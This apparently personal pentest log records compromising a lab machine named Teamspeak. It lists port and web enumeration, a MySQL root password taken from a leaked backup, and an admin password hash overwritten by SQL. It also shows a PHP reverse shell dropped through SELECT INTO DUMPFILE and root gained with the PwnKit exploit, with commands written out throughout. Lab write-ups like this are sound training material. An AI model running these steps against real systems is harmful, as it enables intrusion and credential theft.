🧪 Pentest Log: {{date:2025-08-31}}

🔍 Target Information

• Machine Name: Teamspeak
• IP Address: 10.11.1.142
• Operating System: Linux

ip=10.11.1.142

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80, 443

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

| http-robots.txt: 2 disallowed entries 
|_/fudforum/ /osclass/

Visit /fudforum/, found a post talking about the backup file

http://10.11.1.142/backuposclass/

Obtain osclass website backup zip, unzip the file, obtain mysql credential

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'RootAccount91ow');

Port 3306

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: LFI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

• Login to mysql database

mysql -u root -p -h $ip --skip-ssl-verify-server-cert

• Locate the osclass admin credential

use osclass;
show tables;
select * from oc_t_admin;


+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
| pk_i_id | s_name        | s_username | s_password                                                   | s_email                 | s_secret | b_moderator |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
|       1 | Administrator | admin      | $2a$15$JPhDhPtjDZA6Ax/7awJbgewcelHRWe9AQmjQ/oaNSef.bf/aZxArW | admin@10.11.1.142.local | NULL     |           0 |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+

• Update admin password

#use the bcrypt.php function from osclass backup file to hash password
<?php
require './oc-includes/Bcrypt.php';

$b = new Bcrypt(15); // cost factor 15 (like your earlier example)
$hash = $b->hash("password");

echo $hash . "\n";
?>


$2a$15$JPhDhPtjDZA6Ax/7awJbgewcelHRWe9AQmjQ/oaNSef.bf/aZxArW:password


UPDATE oc_t_admin
SET s_password = "$2a$15$JPhDhPtjDZA6Ax/7awJbgewcelHRWe9AQmjQ/oaNSef.bf/aZxArW"
WHERE s_name = "Administrator";

• Login to the system, found LFI exploit

https://www.exploit-db.com/exploits/34763

• Upload php reverse shell via mysql console

xxd -p -c 999999 shell.php > payload.hex

SELECT 0x<HEX_BYTES> INTO DUMPFILE '/tmp/reverse.php';

• Obtain the shell

python3 /home/kali/Documents/Shell\ Handler/penelope/penelope.py -p 80

🧬 Privilege Escalation

👤 Current Access

• User: apache
• Groups: 48(apache)
• Shell Type: ssh

🔍 Enumeration

Kernel Check:

uname -a

Found

Linux teamspeak 2.6.32-573.el6.i686 #1 SMP Thu Jul 23 12:37:35 UTC 2015 i686 i686 i386 GNU/Linux

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Kernel Exploit
• Target Binary/Service: N/A
• Reference / Source: https://github.com/ly4k/PwnKit

🔧 Exploit Steps

• Setup

chmod +x PwnKit32

• Smash to root

./PwnKit32

• Key File

5iuz6e8ktzuyhhtitvhn